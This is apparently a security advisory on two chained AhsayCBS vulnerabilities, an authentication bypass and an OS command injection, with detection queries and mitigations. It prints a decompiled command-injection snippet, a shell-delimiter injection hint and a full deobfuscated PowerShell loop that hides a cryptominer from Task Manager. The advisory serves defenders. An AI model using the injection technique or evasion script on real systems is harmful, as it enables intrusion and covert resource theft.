AhsayCBS Dual Zero-Day Exploit Chain: CVE-2026-105133 & CVE-2026-105134 Chained for Unauthenticated RCE
CVE-2026-105133 & CVE-2026-105134 (CWE-287 (Improper Authentication) / CWE-78 (OS Command Injection))
Severity: CRITICAL (CVSS 9.3)
Status: Actively Exploited in the Wild (First Observed Oct 7, 2026 by Huntress)
Affected Systems: AhsayCBS Enterprise Backup Server versions 9.x through 10.3.4
Fixed In: AhsayCBS Security Hotfix Pending / Workaround Required
On October 7 and 8, 2026, security analysts at Huntress uncovered an ongoing campaign weaponizing two zero-day vulnerabilities in AhsayCBS, a popular multi-tenant enterprise backup solution used widely by Managed Service Providers (MSPs). By chaining an authentication bypass in the central API layer (CVE-2026-105133) with an operating system command injection vulnerability in the replication subsystem (CVE-2026-105134, CVSS 9.3), attackers obtain unauthenticated SYSTEM-level remote code execution, deploying persistence web shells and stealthy XMRig cryptocurrency miners designed to evade detection by Windows Task Manager.
Exploit Chain Anatomy
The attack proceeds in two distinct stages across the AhsayCBS Java servlet infrastructure:
Stage 1: Authentication Bypass (CVE-2026-105133)
The authentication verification method checkSysPwd() inside com/ahsay/obs/api/ApiStructsAction.java processes system administration API requests. When an attacker passes a specially manipulated random parameter alongside an empty authentication token, the validation function enters a logic branch that assumes pre-authenticated state, returning an administrative session token without validating the master password.
Stage 2: OS Command Injection (CVE-2026-105134)
Armed with the forged administrative token, the attacker targets the Replication Receiver API endpoint at /rps/api/json/UpdateReceivers.do. This endpoint processes replication host addresses to synchronize secondary backup stores. The handler takes user-supplied values from the random and receiver configuration fields and interpolates them directly into a shell command without sanitization:
// Decompiled snippet from UpdateReceivers.do handler
String receiverHost = jsonObject.getString("receiver_ip");
String cmd = "ping -n 1 " + receiverHost; // Command string constructed via concatenation
Runtime.getRuntime().exec(cmd); // Direct execution via cmd.exe
By injecting shell delimiters (e.g., & powershell -enc ...), the attacker executes arbitrary commands under the permissions of the AhsayCBS service (typically NT AUTHORITY\SYSTEM on Windows servers).
Post-Exploitation & Evasion: The Taskgmr.ps1 Script
Following initial access, the attackers deploy a persistent web shell into the Tomcat webroot and drop a compiled XMRig mining binary renamed as edge.exe to impersonate the legitimate Microsoft Edge browser executable. To ensure the CPU-intensive miner remains undetected by system administrators, the attackers launch an evasive background PowerShell script named Taskgmr.ps1:
# Deobfuscated logic of Taskgmr.ps1 evasion loop
while ($true) {
$proc = Get-Process -Name "taskmgr" -ErrorAction SilentlyContinue
if ($proc) {
# Task Manager is open: Kill miner immediately to hide high CPU usage
Get-Process -Name "edge" -ErrorAction SilentlyContinue | Stop-Process -Force
} else {
# Task Manager closed: Ensure miner is actively running
$miner = Get-Process -Name "edge" -ErrorAction SilentlyContinue
if (-not $miner) {
Start-Process -FilePath "C:\ProgramData\Ahsay\edge.exe" -WindowStyle Hidden
}
}
Start-Sleep -Seconds 2
}
Detection Telemetry & Threat Hunting
Defenders managing AhsayCBS servers should immediately search for evidence of exploitation:
EventID: 4104 AND ("Taskgmr.ps1" OR "edge.exe" OR "/rps/api/json/UpdateReceivers.do")Audit process trees for anomalous child processes spawned by java.exe or tomcat.exe:
# Windows CLI: Query processes spawned by Ahsay Tomcat service
wmic process where "name='cmd.exe' or name='powershell.exe'" get ProcessId,ParentProcessId,CommandLine
Immediate Mitigations
- Network Perimeter Containment: Disconnect or block external internet access to all AhsayCBS management ports (default ports 80, 443, 8080, 8443) immediately. Restrict access strictly to trusted administrative IP addresses via VPN.
- Terminate Malicious Processes: Search for and terminate any suspicious instances of
edge.exerunning from directories outsideC:\Program Files (x86)\Microsoft\Edge\, as well as backgroundpowershell.exeprocesses runningTaskgmr.ps1. - Inspect Webroot for Backdoors: Check
C:\Program Files\AhsayCBS\webapps\for newly created.jspor.jspxfiles modified within the past 7 days.